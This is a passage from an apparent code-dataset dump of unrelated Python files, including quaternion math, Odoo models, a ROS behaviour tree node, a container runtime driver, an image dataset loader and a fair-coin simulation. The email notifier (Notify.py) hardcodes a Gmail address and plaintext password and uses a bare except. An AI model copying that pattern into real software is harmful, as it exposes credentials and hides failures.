matrix corresponding to the output quaternion\n @type xyz: int with the value 1/2/3\n \"\"\"\n v1 = numpy.array(v) / numpy.linalg.norm(numpy.array(v), 2) * sign;\n # v2 : orthogonal vector in z=0 plane\n if v1[0]==0 and v1[1]==0:\n v2 = [1,0,0]\n else:\n v2 = numpy.array([v1[1], -v1[0], 0]) / numpy.linalg.norm(numpy.array([v1[1], -v1[0], 0]), 2);\n v3 = numpy.cross(v1, v2)\n if(xyz==1) :\n m = numpy.matrix([ [v1[0], v2[0], v3[0]], [v1[1], v2[1], v3[1]], [v1[2], v2[2], v3[2]] ])\n if(xyz==2) :\n m = numpy.matrix([ [v2[0], v1[0], v3[0]], [v2[1], v1[1], v3[1]], [v2[2], v1[2], v3[2]] ])\n if(xyz>=3) :\n m = numpy.matrix([ [v2[0], v3[0], v1[0]], [v2[1], v3[1], v1[1]], [v2[2], v3[2], v1[2]] ])\n q = from_matrix(m)\n return q\n\n\ndef axisToQuat(axis, phi):\n \"\"\" return the quaternion corresponding to rotation around vector axis with angle phi\n \"\"\"\n axis_norm = numpy.linalg.norm(axis)\n if axis_norm < sys.float_info.epsilon:\n return id()\n axis = axis / axis_norm\n return [ axis[0]*math.sin(phi/2),\n axis[1]*math.sin(phi/2),\n axis[2]*math.sin(phi/2),\n math.cos(phi/2) ]\n\ndef quatToAxis(q):\n \"\"\" Return rotation vector corresponding to unit quaternion q in the form of [axis, angle]\n \"\"\"\n q2 = flip(q) # flip q first to ensure that angle is in the [-0, pi] range\n\n half_angle = math.acos( min(re(q2), 1.0) )\n\n if half_angle > sys.float_info.epsilon:\n return [ im(q2) / math.sin(half_angle), 2 * half_angle ]\n\n norm = numpy.linalg.norm( im(q2) )\n if norm > sys.float_info.epsilon:\n sign = 1.0 if half_angle > 0 else -1.0\n return [ im(q2) * (sign / norm), 2 * half_angle ]\n\n return [ numpy.zeros(3), 2 * half_angle ]\n\ndef slerp(q1,q2,t):\n \"\"\" Return spherical linear interpolation between q1 qnd q2\n \"\"\"\n return prod( q1, exp( t*log(prod(conj(q1),q2)) ) )\n\n\n\n\ndef quatToRodrigues(q):\n \"\"\" Return rotation vector corresponding to unit quaternion q in the form of angle*axis\n \"\"\"\n return quatToRotVec(q)\n\n\n#def from_euler_xyz( a ):\n# ## a is a list of 3 euler angles [x,y,z]\n# q = numpy.empty((4, ))\n# q[3] = cos(a[0]/2.0)*cos(a[1]/2.0)*cos(a[2]/2.0) + sin(a[0]/2.0)*sin(a[1]/2.0)*sin(a[2]/2.0);\n# q[0] = sin(a[0]/2.0)*cos(a[1]/2.0)*cos(a[2]/2.0) - cos(a[0]/2.0)*sin(a[1]/2.0)*sin(a[2]/2.0);\n# q[1] = cos(a[0]/2.0)*sin(a[1]/2.0)*cos(a[2]/2.0) + sin(a[0]/2.0)*cos(a[1]/2.0)*sin(a[2]/2.0);\n# q[2] = cos(a[0]/2.0)*cos(a[1]/2.0)*sin(a[2]/2.0) - sin(a[0]/2.0)*sin(a[1]/2.0)*cos(a[2]/2.0);\n# return q\n\n#def to_euler_xyz(q):\n\n# norm = q[0]*q[0]+q[1]+q[1]+q[2]+q[2]\n\n# if math.fabs( norm ) > 1e-8 :\n# normq = norm + q[3]*q[3]\n# q /= math.sqrt(normq)\n# angle = math.acos(q[3]) * 2\n# return q[:3] / norm * angle\n# else :\n# return [0,0,0]\n\n# q = normalized(q)\n# angle = math.acos(q[3]) * 2;\n# v = q[:3]\n# norm = numpy.linalg.norm( v )\n# if norm > 0.0005:\n# v /= norm\n# v *= angle\n# return v\n\n\n##### adapted from http://www.lfd.uci.edu/~gohlke/code/transformations.py.html\n\n# epsilon for testing whether a number is close to zero\n_EPS = numpy.finfo(float).eps * 4.0\n\n# axis sequences for Euler angles\n_NEXT_AXIS = [1, 2, 0, 1]\n\n# map axes strings to/from tuples of inner axis, parity, repetition, frame\n_AXES2TUPLE = {\n 'sxyz': (0, 0, 0, 0), 'sxyx': (0, 0, 1, 0), 'sxzy': (0, 1, 0, 0),\n 'sxzx': (0, 1, 1, 0), 'syzx': (1, 0, 0, 0), 'syzy': (1, 0, 1, 0),\n 'syxz': (1, 1, 0, 0), 'syxy': (1, 1, 1, 0), 'szxy': (2, 0, 0, 0),\n 'szxz': (2, 0, 1, 0), 'szyx': (2, 1, 0, 0), 'szyz': (2, 1, 1, 0),\n 'rzyx': (0, 0, 0, 1), 'rxyx': (0, 0, 1, 1), 'ryzx': (0, 1, 0, 1),\n 
'rxzx': (0, 1, 1, 1), 'rxzy': (1, 0, 0, 1), 'ryzy': (1, 0, 1, 1),\n 'rzxy': (1, 1, 0, 1), 'ryxy': (1, 1, 1, 1), 'ryxz': (2, 0, 0, 1),\n 'rzxz': (2, 0, 1, 1), 'rxyz': (2, 1, 0, 1), 'rzyz': (2, 1, 1, 1)}\n\n_TUPLE2AXES = dict((v, k) for k, v in _AXES2TUPLE.items())\n\n\n\ndef euler_from_matrix(M, axes='sxyz'):\n \"\"\"Return Euler angles from rotation matrix for specified axis sequence.\n @warning returns a numpy array\n\n axes : One of 24 axis sequences as string or encoded tuple\n\n Note that many Euler angle triplets can describe one matrix.\n\n >>> R0 = euler_matrix(1, 2, 3, 'syxz')\n >>> al, be, ga = euler_from_matrix(R0, 'syxz')\n >>> R1 = euler_matrix(al, be, ga, 'syxz')\n >>> numpy.allclose(R0, R1)\n True\n >>> angles = (4*math.pi) * (numpy.random.random(3) - 0.5)\n >>> for axes in _AXES2TUPLE.keys():\n ... R0 = euler_matrix(axes=axes, *angles)\n ... R1 = euler_matrix(axes=axes, *euler_from_matrix(R0, axes))\n ... if not numpy.allclose(R0, R1): print(axes, \"failed\")\n\n \"\"\"\n try:\n firstaxis, parity, repetition, frame = _AXES2TUPLE[axes.lower()]\n except (AttributeError, KeyError):\n _TUPLE2AXES[axes] # validation\n firstaxis, parity, repetition, frame = axes\n\n i = firstaxis\n j = _NEXT_AXIS[i+parity]\n k = _NEXT_AXIS[i-parity+1]\n\n# M = numpy.array(matrix, dtype=numpy.float64, copy=False)[:3, :3]\n a = numpy.empty((3, ))\n\n if repetition:\n sy = math.sqrt(M[i, j]*M[i, j] + M[i, k]*M[i, k])\n if sy > _EPS:\n a[0] = math.atan2( M[i, j], M[i, k])\n a[1] = math.atan2( sy, M[i, i])\n a[2] = math.atan2( M[j, i], -M[k, i])\n else:\n a[0] = math.atan2(-M[j, k], M[j, j])\n a[1] = math.atan2( sy, M[i, i])\n a[2] = 0.0\n else:\n cy = math.sqrt(M[i, i]*M[i, i] + M[j, i]*M[j, i])\n if cy > _EPS:\n a[0] = math.atan2( M[k, j], M[k, k])\n a[1] = math.atan2(-M[k, i], cy)\n a[2] = math.atan2( M[j, i], M[i, i])\n else:\n a[0] = math.atan2(-M[j, k], M[j, j])\n a[1] = math.atan2(-M[k, i], cy)\n a[2] = 0.0\n\n if parity:\n a[0], a[1], a[2] = -a[0], -a[1], -a[2]\n if frame:\n a[0], a[2] = a[2], a[0]\n return a\n\ndef to_euler(q, axes='sxyz'):\n \"\"\"Return Euler angles from quaternion for specified axis sequence.\n @warning returns a numpy array\n \"\"\"\n return euler_from_matrix( to_matrix(q), axes )\n\n\ndef from_euler( a, axes='sxyz' ):\n \"\"\"Return quaternion from Euler angles and axis sequence.\n @warning returns a numpy array\n\n a is a list of 3 euler angles [x,y,z]\n axes : One of 24 axis sequences as string or encoded tuple\n\n >>> q = quaternion_from_euler(1, 2, 3, 'ryxz')\n >>> numpy.allclose(q, [0.435953, 0.310622, -0.718287, 0.444435])\n True\n\n \"\"\"\n try:\n firstaxis, parity, repetition, frame = _AXES2TUPLE[axes.lower()]\n except (AttributeError, KeyError):\n _TUPLE2AXES[axes] # validation\n firstaxis, parity, repetition, frame = axes\n\n i = firstaxis\n j = _NEXT_AXIS[i+parity]\n k = _NEXT_AXIS[i-parity+1]\n\n if frame:\n a[0], a[2] = a[2], a[0]\n if parity:\n a[1] = -a[1]\n\n a[0] /= 2.0\n a[1] /= 2.0\n a[2] /= 2.0\n ci = math.cos(a[0])\n si = math.sin(a[0])\n cj = math.cos(a[1])\n sj = math.sin(a[1])\n ck = math.cos(a[2])\n sk = math.sin(a[2])\n cc = ci*ck\n cs = ci*sk\n sc = si*ck\n ss = si*sk\n\n q = numpy.empty((4, ))\n if repetition:\n q[3] = cj*(cc - ss)\n q[i] = cj*(cs + sc)\n q[j] = sj*(cc + ss)\n q[k] = sj*(cs - sc)\n else:\n q[3] = cj*cc + sj*ss\n q[i] = cj*sc - sj*cs\n q[j] = cj*ss + sj*cc\n q[k] = cj*cs - sj*sc\n if parity:\n q[j] *= -1.0\n\n return 
q\n","sub_path":"dependencies/numerics/Quaternion.py","file_name":"Quaternion.py","file_ext":"py","file_size_in_byte":12872,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} {"seq_id":"428989797","text":"# -*- coding: utf-8 -*-\n# Part of Odoo. See LICENSE file for full copyright and licensing details.\nfrom odoo.addons import decimal_precision as dp\nfrom odoo import models, fields, api\n\nclass ProductTemplate(models.Model):\n    _inherit = \"product.template\"\n\n    @api.model\n    def _default_currency(self):\n        return self.env.user.company_id.currency_id\n\n    dnk_cost_mp = fields.Float(\n        string=\"- Cost Materials\",\n        compute='_compute_cost',\n        inverse='_set_cost',\n        digits=dp.get_precision('Product Price'), groups=\"base.group_user\")\n\n    dnk_cost_mo = fields.Float(\n        string=\"- Cost Labor\",\n        inverse='_set_cost',\n        digits=dp.get_precision('Product Price'), groups=\"base.group_user\")\n\n    dnk_cost_gif = fields.Float(\n        string=\"- GIF Cost\",\n        inverse='_set_cost',\n        digits=dp.get_precision('Product Price'), groups=\"base.group_user\")\n\n    dnk_costs_currency_id = fields.Many2one('res.currency', string='- MP Cost Currency', default=_default_currency)\n\n    dnk_product_cost_ids = fields.One2many('dnk.product.costs', 'dnk_product_tmpl_id', string=\"- Denker Costs (USD)\")\n\n\n    @api.one\n    def _set_cost(self):\n        if len(self.product_variant_ids) == 1:\n            self.product_variant_ids.dnk_cost_mp = self.dnk_cost_mp\n\n\n    @api.depends('product_variant_ids', 'product_variant_ids.standard_price')\n    def _compute_cost(self):\n        unique_variants = self.filtered(lambda template: len(template.product_variant_ids) == 1)\n\n        for template in unique_variants:\n            template.dnk_costs_currency_id = template.product_variant_ids.dnk_costs_currency_id\n            template.dnk_cost_mp = template.product_variant_ids.dnk_cost_mp\n        for template in (self - unique_variants):\n            template.dnk_cost_mp = 0.0\n            if template.product_variant_ids:\n                template.dnk_costs_currency_id = template.product_variant_ids[0].dnk_costs_currency_id\n\n\nclass ProductProduct(models.Model):\n    _inherit = \"product.product\"\n\n    dnk_cost_mp = fields.Float(\n        string=\"- MP Cost\",\n        company_dependent=True,\n        digits=dp.get_precision('Product Price'), groups=\"base.group_user\")\n    dnk_cost_mo = fields.Float(\n        string=\"- MO Cost\",\n        company_dependent=True,\n        digits=dp.get_precision('Product Price'), groups=\"base.group_user\")\n    dnk_cost_gif = fields.Float(\n        string=\"- GIF Cost\",\n        company_dependent=True,\n        digits=dp.get_precision('Product Price'), groups=\"base.group_user\")\n\n    dnk_costs_currency_id = fields.Many2one('res.currency', string='- MP Cost Currency', related='product_tmpl_id.dnk_costs_currency_id')\n\n    dnk_product_cost_ids = fields.One2many('dnk.product.costs', 'dnk_product_id', string=\"- Denker Costs (USD)\")\n","sub_path":"denker/dnk_sale_costs/models/product.py","file_name":"product.py","file_ext":"py","file_size_in_byte":2779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} {"seq_id":"349966602","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n# Python packages\nfrom math import pi\n\n# ROS packages\nimport py_trees\nfrom geometry_msgs.msg import Point, Pose2D\n\n# Our packages\nimport ar_utils.action as action\n\n\nclass GenerateNextPose(py_trees.behaviour.Behaviour):\n    \"\"\"\n    Generate a new goal pose and make available the corresponding position and\n    orientation as two separate keys. 
We could just make that pose available\n    as a single variable, if Move2Pose accepted Pose2D (or Pose) goals, but it\n    is left as it is to provide a richer example.\n    \"\"\"\n    def __init__(self, name, pos_key: str, angle_key: str):\n        super(GenerateNextPose, self).__init__(name)\n        self.pos_key = pos_key\n        self.angle_key = angle_key\n\n        # Waypoints list\n        self.waypoints = [Pose2D(x=2.0, y=3.0, theta=pi),\n                          Pose2D(x=-3.0, y=-2.0, theta=pi/2.0)]\n        self.curr_waypoint = -1\n\n    def setup(self, **kwargs):\n        \"\"\" Get blackboard client and register for the relevant keys \"\"\"\n        self.logger.debug(\"{}.setup()\".format(self.qualified_name))\n        # Store the node. You can use it for any ROS-related functionality\n        try:\n            self.node = kwargs['node']\n        except KeyError as e:\n            error_message = \"didn't find 'node' in setup's kwargs \" + \\\n                            \"[{}][{}]\".format(self.qualified_name,\n                                              self.__class__.__name__)\n            raise KeyError(error_message) from e # 'direct cause' traceability\n        # Now set up the blackboard key access\n        self.blackboard = py_trees.blackboard.Client()\n        self.blackboard.register_key(key=self.pos_key,\n                                     access=py_trees.common.Access.WRITE)\n        self.blackboard.register_key(key=self.angle_key,\n                                     access=py_trees.common.Access.WRITE)\n        self.logger.debug(\" %s [GenerateNextPose::setup()]\" % self.name)\n\n    def initialise(self):\n        \"\"\" Nothing special to do \"\"\"\n        self.logger.debug(\" %s [GenerateNextPose::initialise()]\" % self.name)\n\n    def update(self):\n        \"\"\"\n        Read the goal_pose from the blackboard and store the position and\n        orientation\n        \"\"\"\n        self.logger.debug(\" %s [GenerateNextPose::update()]\" % self.name)\n\n        # This behavior will always be successful. But if that were not the\n        # case, it would return failure\n        # self.feedback_message = \"Some failure message!\"\n        # return py_trees.common.Status.FAILURE\n\n        # If the behavior could be running for a while, we would have to return\n        # py_trees.common.Status.RUNNING, and not block its execution.\n\n        # In this example we just need to create the position and orientation\n        # keys corresponding to the next desired pose.\n        self.curr_waypoint = (self.curr_waypoint + 1) % len(self.waypoints)\n        self.blackboard.set(self.pos_key,\n                            action.Move2Pos.Goal(target_position=Point(\n                                x=self.waypoints[self.curr_waypoint].x,\n                                y=self.waypoints[self.curr_waypoint].y,\n                                z=0.0)))\n        self.blackboard.set(\n            self.angle_key,\n            action.Rotate2Angle.Goal(\n                target_orientation=self.waypoints[self.curr_waypoint].theta))\n        self.feedback_message = \"New position and orientation generated!\"\n        return py_trees.common.Status.SUCCESS\n\n    def terminate(self, new_status):\n        \"\"\"\n        When is this called?\n        Whenever your behaviour switches to a non-running state.\n        - SUCCESS || FAILURE : your behaviour's work cycle has finished\n        - INVALID : a higher priority branch has interrupted, or shutting\n        down\n        \"\"\"\n        self.logger.debug(f\" {self.name} [GenerateNextPose::terminate().\" +\n                          f\"terminate()]{self.status}->{new_status}]\")\n","sub_path":"src/tw11/tw11/behaviors.py","file_name":"behaviors.py","file_ext":"py","file_size_in_byte":4003,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} {"seq_id":"156008640","text":"# -*- coding: utf-8 -*-\nfrom materials.sia262 import SIA262_limit_state_checking\n\nexecfile('../env_config.py')\n\n#Reinforced concrete sections on each element.\nreinfConcreteSections= RC_material_distribution.loadRCMaterialDistribution()\n\n
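# Select the fatigue limit state, attach the SIA262-specific controller and run\n# the check over every reinforced concrete section (added summary of the three\n# statements below).\nlimitStateLabel= 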
lsd.fatigueResistance.label\nlsd.fatigueResistance.controller= SIA262_limit_state_checking.FatigueController(limitStateLabel)\nmeanFCs= lsd.fatigueResistance.check(reinfConcreteSections)\n\n\n","sub_path":"workingModel/calculations/verif_fatigueULS.py","file_name":"verif_fatigueULS.py","file_ext":"py","file_size_in_byte":441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} {"seq_id":"472539412","text":"#Module: EmailNotify\n#Implements email notifications for emergency notification.\n'''\n\nSMTP\nraspberrypi.julianpineiro@gmail.com\n'''\nimport os\nimport smtplib\nfrom os.path import basename\nfrom email.mime.application import MIMEApplication\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.text import MIMEText\nfrom email.utils import COMMASPACE, formatdate\n\n#SMTP Configuration\nsent_from = 'raspberry.julianpineiro@gmail.com'\nto = 'julipineiro@gmail.com'\nsubject = 'Raspberry Pi Notification'\nbody = ''\nmsg = MIMEMultipart()\nmsg['Subject'] = subject\nmsg['From'] = sent_from\nmsg['To'] = to\n\n#Send email function.\ndef notify(body_text):\n    text = MIMEText(body_text)\n    msg.attach(text)\n    try: \n        server = smtplib.SMTP_SSL('smtp.gmail.com')\n        server.ehlo()\n        #print(\"Trying to log in...\")\n        server.login('raspberry.julianpineiro@gmail.com', 'raspberrypass')\n        #print(\"Logged in successfully!\")\n        #print(\"Sending...\")\n        server.sendmail(sent_from, to, msg.as_string())\n        server.close()\n        #print ('Email sent!')\n        \n    except: \n        print ('Check Internet Connection... Something went wrong! :(')\n\n","sub_path":"Notify.py","file_name":"Notify.py","file_ext":"py","file_size_in_byte":1168,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} {"seq_id":"88947378","text":"\"\"\"Charliecloud driver as the container runtime system for tasks.\n\nCreates text for tasks using Charliecloud.\n\"\"\"\n\nimport os\nimport yaml\nfrom beeflow.common.crt.crt_driver import (ContainerRuntimeDriver, ContainerRuntimeResult,\n                                           Command, CommandType)\nfrom beeflow.common.config_driver import BeeConfig as bc\nfrom beeflow.common.build.build_driver import task2arg\nfrom beeflow.common.container_path import convert_path\nfrom beeflow.common import log as bee_logging\n\n\nlog = bee_logging.setup(__name__)\n\n\nclass CharliecloudDriver(ContainerRuntimeDriver):\n    \"\"\"The ContainerRuntimeDriver for Charliecloud as container runtime system.\n\n    Creates the text for the task for using Charliecloud.\n    \"\"\"\n\n    def __init__(self):\n        \"\"\"Create CharliecloudDriver object.\"\"\"\n        # Retrieve Charliecloud options from configuration file.\n        self.chrun_opts = bc.get('charliecloud', 'chrun_opts')\n        self.cc_setup = bc.get('charliecloud', 'setup')\n        # Read container archive path from config.\n        container_archive = bc.get('builder', 'container_archive')\n        self.container_archive = bc.resolve_path(container_archive)\n\n    @staticmethod\n    def get_ccname(image_path):\n        \"\"\"Strip directories & .tar, .tar.gz, tar.xz, or .tgz from image path.\"\"\"\n        name = os.path.basename(image_path).rsplit('.', 2)\n        if name[-1] in ['gz', 'xz']:\n            name.pop()\n        if name[-1] in ['tar', 'tgz']:\n            name.pop()\n        name = '.'.join(name)\n        return name\n\n    def run_text(self, task): # noqa\n        \"\"\"Create text for Charliecloud batch script.\"\"\"\n        os.makedirs(self.container_archive, exist_ok=True)\n        log.info(f'Build container archive directory is: {self.container_archive}')\n\n        use_container = None\n        task_container_name = task.get_requirement('DockerRequirement', 
'beeflow:containerName')\n bind_mounts = task.get_requirement('DockerRequirement', 'beeflow:bindMounts')\n bind_mounts = (yaml.load(bind_mounts, Loader=yaml.SafeLoader)\n if bind_mounts is not None else {})\n\n baremetal = False\n if task_container_name is None:\n baremetal = True\n log.info('No beeflow:containerName provided.')\n runtime_target_list = []\n # Harvest beeflow:copyContainer if it exists.\n task_container_path = task.get_requirement('DockerRequirement',\n 'beeflow:copyContainer')\n if task_container_path:\n task_container_path = os.path.basename(task_container_path).split('.')[0]\n runtime_target_list.append(task_container_path)\n\n # Harvest dockerPull if it exists\n task_addr = task.get_requirement('DockerRequirement', 'dockerPull')\n if task_addr:\n task_container_path = task_addr.replace('/', '%')\n runtime_target_list.append(task_container_path)\n log.info(f'Found dockerPull path {task_container_path}. Using its container name.')\n if len(runtime_target_list) > 1:\n raise RuntimeError(\n 'Too many container runtimes specified! Pick one per workflow step.'\n )\n if len(runtime_target_list) == 0:\n log.warning('No beeflow:containerName specified.')\n else:\n baremetal = False\n # Build container name from container path.\n task_container_name = runtime_target_list[0]\n log.info(f'Moving w/expectation: {task_container_name} is the container target.')\n\n # Check for `beeflow:useContainer`\n use_container = task.get_requirement('DockerRequirement', 'beeflow:useContainer')\n if use_container:\n log.info(f'Found beeflow:useContainer option. Using container {use_container}')\n baremetal = False\n\n # Set the workdir with the env code\n task_workdir_env = f'cd {task.workdir}\\n' if task.workdir is not None else ''\n\n if baremetal:\n return ContainerRuntimeResult(env_code=task_workdir_env, pre_commands=[],\n main_command=Command([str(arg) for arg in task.command]),\n post_commands=[])\n\n if task_container_name:\n container_path = '/'.join([self.container_archive, task_container_name]) + '.tar.gz'\n\n # If use_container is specified, no copying is done, the file path is used\n if use_container:\n task_container_name = self.get_ccname(use_container)\n container_path = os.path.expanduser(use_container)\n else:\n container_path = '/'.join([self.container_archive, task_container_name]) + '.tar.gz'\n\n log.info(f'Expecting container at {container_path}. 
Ready to deploy and run.')\n\n deployed_image_root = bc.get('builder', 'deployed_image_root')\n\n hints = dict(task.hints)\n # --join is only supported with Slurm (maybe this logic shouldn't be in here)\n if bc.get('DEFAULT', 'workload_scheduler') == 'Slurm':\n mpi_opt = '--join' if 'beeflow:MPIRequirement' in hints else ''\n else:\n mpi_opt = ''\n command = ' '.join(task.command)\n env_code = '\\n'.join([self.cc_setup if self.cc_setup else '', task_workdir_env])\n deployed_path = deployed_image_root + '/' + task_container_name\n pre_commands = [\n Command(f'mkdir -p {deployed_image_root}\\n'.split(), CommandType.ONE_PER_NODE),\n Command(f'ch-convert -i tar -o dir {container_path} {deployed_path}\\n'.split(),\n CommandType.ONE_PER_NODE),\n ]\n # Need to convert the path from inside to outside base on the bind mounts\n extra_opts = ''\n if task.workdir is not None:\n # Only setting it for $HOME right now\n bind_mounts = {\n # Charliecloud bindmounts $HOME to /home/$USER by default\n os.getenv('HOME'): os.path.join('/home', os.getenv('USER')),\n }\n ctr_workdir_path = convert_path(task.workdir, bind_mounts)\n extra_opts = f'--cd {ctr_workdir_path}'\n bind_mount_opts = ' '.join(f'-b {path_a}:{path_b}'\n for path_a, path_b in bind_mounts.items())\n main_command = (f'ch-run {mpi_opt} {deployed_path} {self.chrun_opts} '\n f'{extra_opts} {bind_mount_opts} -- {command}\\n').split()\n main_command = Command(main_command)\n post_commands = [\n Command(f'rm -rf {deployed_path}\\n'.split(), type_=CommandType.ONE_PER_NODE),\n ]\n return ContainerRuntimeResult(env_code, pre_commands, main_command, post_commands)\n\n def build_text(self, userconfig, task):\n \"\"\"Build text for Charliecloud batch script.\"\"\"\n task_args = task2arg(task)\n text = (f'beeflow --build {userconfig} {task_args}\\n')\n return text\n","sub_path":"beeflow/common/crt/charliecloud_driver.py","file_name":"charliecloud_driver.py","file_ext":"py","file_size_in_byte":7091,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"632124347","text":"from turtle import Turtle, Screen\nimport random\n\ndef ChangeWindowColor(color = 'white'):\n window = Screen()\n window.bgcolor(color)\n\ndef DrawLines(turtles = 8, ang = 360, colors = ['blue', 'red', 'orange', 'black'], shapes = ['classic', 'circle', 'turtle', 'triangle'], draw = True, stamp = True):\n pens = [] #Pens list\n shapeCount = 0\n for _ in range(0,turtles): #Create pen objects\n if shapeCount >= len(shapes): ##Iterate through shapes and make sure not to go above the max length of the shapes list\n shapeCount = 0\n pens.append(Turtle(visible=False, shape=shapes[shapeCount])) ##Create pen\n shapeCount += 1 #Increase shape counter by 1\n \n moveBy = ang/turtles\n count = 0\n colorCount = 0\n for pen in pens: #Move pen objects\n if not draw:\n pen.penup()\n\n ##Set color of pen\n if colorCount >= len(colors):\n colorCount = 0\n pen.color(colors[colorCount])\n colorCount += 1\n\n ##Move pen\n pen.left(moveBy*count)\n pen.forward(100)\n \n if stamp: ##Show or hide pen before moving it forward\n pen.stamp()\n\n count += 1\n\nChangeWindowColor('yellow')\nDrawLines(turtles=16, colors=['pink', 'purple', 'red', 'blue', 'orange', 'magenta'], draw=False)\ninput()","sub_path":"An Hour of Python!/DeepTurtle.py","file_name":"DeepTurtle.py","file_ext":"py","file_size_in_byte":1313,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"179140821","text":"import os.path\nimport torchvision.transforms 
as transforms\nfrom data.base_dataset import BaseDataset, get_transform\nfrom data.image_folder import make_dataset\nfrom PIL import Image\nimport PIL\nfrom pdb import set_trace as st\nimport random\nfrom skimage import io, color\nimport numpy\n\n\nclass UnalignedDataset(BaseDataset):\n    def initialize(self, opt):\n        self.opt = opt\n        self.root = opt.dataroot\n        self.dir_A = os.path.join(opt.dataroot, opt.phase + 'A')\n        self.dir_B = os.path.join(opt.dataroot, opt.phase + 'B')\n\n        self.A_paths = make_dataset(self.dir_A)\n        self.B_paths = make_dataset(self.dir_B)\n\n        self.A_paths = sorted(self.A_paths)\n        self.B_paths = sorted(self.B_paths)\n        self.A_size = len(self.A_paths)\n        self.B_size = len(self.B_paths)\n        self.transform_gray = get_transform(opt)\n        # opt.grayscale = False\n        # self.transform = get_transform(opt)\n\n    def __getitem__(self, index):\n        A_path = self.A_paths[index % self.A_size]\n        index_A = index % self.A_size\n        index_B = random.randint(0, self.B_size - 1)\n        B_path = self.B_paths[index_B]\n        # print('(A, B) = (%d, %d)' % (index_A, index_B))\n\n        A_img_raw = Image.open(A_path).convert('RGB')\n        B_img_raw = Image.open(B_path).convert('RGB')\n        # A_img = to_Lab(io.imread(A_path)) # for Lab color space\n        # B_img = to_Lab(io.imread(B_path))\n\n        A_img = self.transform_gray(A_img_raw)\n        # A_aux = self.transform(A_img_raw)\n        # B_img = self.transform(B_img_raw)\n        B_img = self.transform_gray(B_img_raw)\n        A_aux = A_img[0:3]\n        B_aux = B_img[3:6]\n        A_img = A_img[3:6]\n        B_img = B_img[0:3]\n        # print(A_img.size())\n        # print(B_img.size())\n\n        return {'A': A_img, 'B': B_img, 'A_aux': A_aux, 'B_aux': B_aux,\n                'A_paths': A_path, 'B_paths': B_path}\n\n    def __len__(self):\n        return max(self.A_size, self.B_size)\n\n    def name(self):\n        return 'UnalignedDataset'\n","sub_path":"data/unaligned_dataset.py","file_name":"unaligned_dataset.py","file_ext":"py","file_size_in_byte":2025,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} {"seq_id":"320612026","text":"#! /usr/bin/env python3\n# -*- coding: utf-8; mode: python -*-\n\"\"\" Small Python 3.4 script to check the von Neumann method for generating a fair coin from a biased one.\n\n- Reference: https://en.wikipedia.org/wiki/Fair_coin#Fair_results_from_a_biased_coin\n\n\n- *Date:* Tuesday 22 March 2016.\n- *Author:* Lilian Besson, for the MVA Master, (C) 2015-16.\n- *Licence:* MIT Licence (http://lbesson.mit-license.org).\n\"\"\"\n\nfrom __future__ import print_function, division # Python 2 compatibility if needed\nimport numpy as np\n\n\ndef coin(p=0.5):\n    \"\"\" 1 with probability = p, 0 with probability 1 - p. \"\"\"\n    return 1 * (np.random.random() < p)\n\n\ndef vonNeumann(q=0.5):\n    \"\"\" Use von Neumann's rejection algorithm with an unknown coin (Bernoulli q). \"\"\"\n    x, y = coin(q), coin(q)\n    while x == y: # (x, y) not in {(0, 1), (1, 0)}\n        x, y = coin(q), coin(q)\n    return x\n\n\n# Why the result is fair (added note): P(x=1, y=0) = q*(1-q) = P(x=0, y=1) for any\n# fixed q in (0, 1), so conditioned on x != y both outcomes are equally likely.\n\n\ndef main(n=1000):\n    \"\"\" Check that the von Neumann method is indeed simulating a fair coin. \"\"\"\n    print(\n        \"\\n\\n- Using n = {} tests of the von Neumann method, with unknown q in (0, 1).\".format(\n            n\n        )\n    )\n    q = 1.0 / np.pi # Unknown float number 0.3183098861837907\n    tests = [vonNeumann(q) for _ in range(n)]\n    assert all(\n        i in {0, 1} for i in tests\n    ), \"Error of the vonNeumann function: a value outside of {0, 1} has been produced...\"\n    mu, sigma = np.mean(tests), np.var(tests)\n    print(\n        \"For the values x generated by the vonNeumann(q) function:\\n Average mu = {:.4g} (should be 0.5) and variance sigma = {:.4g} (should be 0.25).\".format(\n            mu, sigma\n        )\n    )\n    delta_mu = abs(mu - 0.5) / 0.5\n    delta_sigma = abs(sigma - 0.25) / 0.25\n    print(\n        \"Relative errors: delta_mu = {:.5%} and delta sigma = {:.5%} (both should be small).\".format(\n            delta_mu, delta_sigma\n        )\n    )\n    return mu, sigma\n\n\nif __name__ == \"__main__\":\n    for n in (10 ** i for i in range(1, 8)):\n        main(n)\n\n# End of fairCoin.py\n","sub_path":"_RESOURCES/my-gists/__CONTAINER/8b2c5f97ac/8b2c5f97ac9b0/fairCoin.py","file_name":"fairCoin.py","file_ext":"py","file_size_in_byte":1990,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} {"seq_id":"326130893","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nfrom utils.format import fmt, pfmt\nfrom utils.isinstance import *\n\nfrom utils.dictionary import head, body, head_body, keys_ending\n\nclass VisitError(Exception):\n    def __init__(self, obj):\n        msg = fmt('unknown type obj = {obj}')\n        super(VisitError, self).__init__(msg)\n\ndef create_cert_name(common_name, timestamp, sep='@'):\n    return fmt('{common_name}{sep}{timestamp}')\n\ndef decompose_cert_name(cert_name, sep='@'):\n    return cert_name.split(sep)\n\ndef decompose_cert(cert):\n    cert_name, cert_body = head_body(cert)\n    common_name = cert_body['common_name']\n    tardata_body = body(cert_body['tardata'])\n    crt_filename = keys_ending(tardata_body, 'crt')[0]\n    csr_filename = keys_ending(tardata_body, 'csr')[0]\n    key_filename = keys_ending(tardata_body, 'key')[0]\n    crt = tardata_body[crt_filename]\n    csr = tardata_body[csr_filename]\n    key = tardata_body[key_filename]\n    return cert_name, common_name, crt, csr, key\n\ndef printit(obj):\n    print(obj)\n    return obj\n\ndef simple(obj):\n    if istuple(obj):\n        key, value = obj\n        if key[-3:] in ('crt', 'csr', 'key'):\n            value = key[-3:].upper()\n        return 